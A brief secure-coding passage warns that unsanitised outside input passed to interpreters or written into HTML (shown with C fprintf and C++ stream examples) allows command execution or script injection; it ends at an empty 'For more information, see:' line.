Care must be taken when constructing statements that are passed to an interpreter, when putting arbitrary strings inside (using substring expansion or other methods). This is because if the strings are subject to input from the outside world (including the users), then one can use specially crafted strings for executing arbitrary commands and exploiting the system.

An example of this is outputting HTML using fprintf(file_handle, "<p>%s</p>\n", paragraph_text); or my_file_fh << "<p>" << paragraph_text << "</p>" << std::endl; which may allow inserting arbitrary, malicious, markup inside paragraph_text, which may include malicious JavaScript, that can steal passwords or alter the page’s contents.

For more information, see: